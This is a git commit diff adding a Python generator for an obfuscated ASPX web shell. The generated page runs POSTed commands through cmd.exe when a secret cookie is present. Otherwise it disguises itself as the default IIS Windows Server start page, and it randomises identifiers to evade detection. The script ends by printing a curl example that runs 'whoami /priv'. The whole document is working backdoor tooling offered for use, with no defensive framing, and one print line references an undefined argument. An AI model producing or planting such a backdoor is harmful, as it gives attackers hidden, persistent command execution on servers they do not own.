added simple aspx backdoor with iis templateHEADmain

1 files changed, 135 insertions, 0 deletions

diff --git a/aspx-backdoor.py b/aspx-backdoor.py
new file mode 100644
index 0000000..1b53ade
--- /dev/null
+++ b/aspx-backdoor.py
@@ -0,0 +1,135 @@
+#!/usr/bin/env python3
+
+import os
+import re
+import random
+import string
+from textwrap import dedent
+from argparse import ArgumentParser
+
+def obfuscate(s):
+    pattern = r'\{\*(.*?)\*\}'
+    placeholder_values = {}
+
+    def get_or_generate_random_string(match):
+        placeholder = match.group(1)
+        if placeholder not in placeholder_values:
+            placeholder_values[placeholder] = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
+        return placeholder_values[placeholder]
+
+    result_string = re.sub(pattern, get_or_generate_random_string, s)
+
+    return result_string
+
+def generate_aspx_backdoor(args):
+    code = '200'
+    status = '200 OK'
+    iisstart_template = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
+<title>IIS Windows Server</title>
+<style type="text/css">
+<!--
+body {
+    color:#000000;
+    background-color:#0072C6;
+    margin:0;
+}
+
+#container {
+    margin-left:auto;
+    margin-right:auto;
+    text-align:center;
+}
+
+a img {
+    border:none;
+}
+
+-->
+</style>
+</head>
+<body>
+<div id="container">
+<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
+</div>
+</body>
+</html>'''
+    lines = iisstart_template.split('\n')
+    processed_lines = ['"' + line.replace('"', '""') + '" & vbCrLf & _' for line in lines]
+    response = '\n'.join(processed_lines)
+    response = response.rstrip(' & vbCrLf & _')
+
+    backdoor = f'''<%@ Page Language="VB" Debug="true" %>
+<%@ Import Namespace="System.IO" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.Web" %>
+
+<script runat="server">
+    Sub Page_Load(ByVal {{*sender*}} As Object, ByVal {{*e*}} As EventArgs)
+        Dim {{*cookieMarker*}} As HttpCookie = Request.Cookies("{args.cookie_name}")
+        If {{*cookieMarker*}} IsNot Nothing AndAlso {{*cookieMarker*}}.Value = "{args.password}" Then
+            Dim {{*command1*}} As String = {{*GetCommandFromPost*}}()
+
+            If Not String.IsNullOrEmpty({{*command1*}}) Then
+                {{*command1*}} = HttpUtility.UrlDecode({{*command1*}})
+                {{*ExecuteCommand*}}({{*command1*}})
+            End If
+        Else
+            Response.StatusCode = {code}
+            Response.Status = "{status}"
+            Response.Write({response})
+        End If
+    End Sub
+
+    Function {{*GetCommandFromPost*}}() As String
+        Dim {{*commandParam*}} As String = "cmd="
+        Dim {{*command2*}} As String = Nothing
+
+        If Request.HttpMethod = "POST" Then
+            Using {{*reader*}} As New StreamReader(Request.InputStream)
+                Dim {{*requestBody*}} As String = {{*reader*}}.ReadToEnd()
+
+                Dim {{*cmdIndex*}} As Integer = {{*requestBody*}}.IndexOf({{*commandParam*}})
+                If {{*cmdIndex*}} <> -1 Then
+                    {{*command2*}} = {{*requestBody*}}.Substring({{*cmdIndex*}} + {{*commandParam*}}.Length)
+                End If
+            End Using
+        End If
+
+        Return {{*command2*}}
+    End Function
+
+    Sub {{*ExecuteCommand*}}(ByVal {{*command3*}} As String)
+        Dim {{*myProcess*}} As New Process()
+        Dim {{*myProcessStartInfo*}} As New ProcessStartInfo("cmd.exe")
+        {{*myProcessStartInfo*}}.UseShellExecute = False
+        {{*myProcessStartInfo*}}.RedirectStandardOutput = True
+        {{*myProcessStartInfo*}}.Arguments = "/c " & {{*command3*}}
+        {{*myProcess*}}.StartInfo = {{*myProcessStartInfo*}}
+        {{*myProcess*}}.Start()
+
+        Dim {{*myStreamReader*}} As StreamReader = {{*myProcess*}}.StandardOutput
+        Dim {{*myString*}} As String = {{*myStreamReader*}}.ReadToEnd()
+        {{*myProcess*}}.Close()
+        Response.Write({{*myString*}})
+    End Sub
+</script>'''
+
+    with open(f'backdoor_{args.cookie_name}:{args.password}.aspx', 'w') as fh:
+        fh.write(obfuscate(backdoor))
+
+    print(f'[INFO] created aspx backdoor as "backdoor_{args.cookie_name}:{args.password}.aspx"')
+    print('[INFO] issue commands with:')
+    print('curl http://example.com/backdoor.aspx -H "Cookie: {args.cookie}={args.password}" -d "cmd=whoami /priv" -X POST')
+
+
+if __name__ == '__main__':
+    parser = ArgumentParser()
+    parser.add_argument('-c', '--cookie-name', required=True)
+    parser.add_argument('-p', '--password', required=True)
+    args = parser.parse_args()
+
+    generate_aspx_backdoor(args)
+